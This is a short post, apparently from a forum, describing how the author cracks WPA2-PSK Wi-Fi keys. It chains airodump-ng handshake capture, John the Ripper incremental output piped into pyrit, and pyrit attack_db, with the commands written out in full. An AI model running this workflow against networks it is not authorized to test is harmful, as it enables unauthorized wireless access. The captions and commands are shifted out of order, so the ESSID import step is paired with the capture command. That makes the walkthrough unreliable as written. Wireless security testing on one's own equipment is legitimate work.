Using JTR and Pyrit to crack WPA2-PSK keys
I have chosen a strong password to access my wireless AP with WPA2 security. I have used John the Ripper, Aircrack-ng, and Pyrit with no luck in finding the correct password with these tools.
What I usually did was to capture the handshake and JTR incremental:all it until the password was found. That taking to long I started compiling hash tables with pyrit. After 3 billion PMKs were created I attempted to attack the AP with no luck in finding the correct password.
New method involves using JTR and pyrit to build the hash tables for all available PMKs and then running pyrit attack_db to complete the crack.
Here's an example:
First use airodump-ng to capture your handshake
Import the essid you want to build a hash table for with
airodump-ng -w file -c channel --bssid BSSID wlan0
Then import the passwords from JTR by piping the results into pyrit with
pyrit -e ESSID create_essid
After that finishes create the tables and attack with
/Desktop/pentest$ sudo /pentest/passwords/john/john --stdout --incremental:all | pyrit -i - import_unique_passwords
pyrit -r BSSID-01.cap attack_db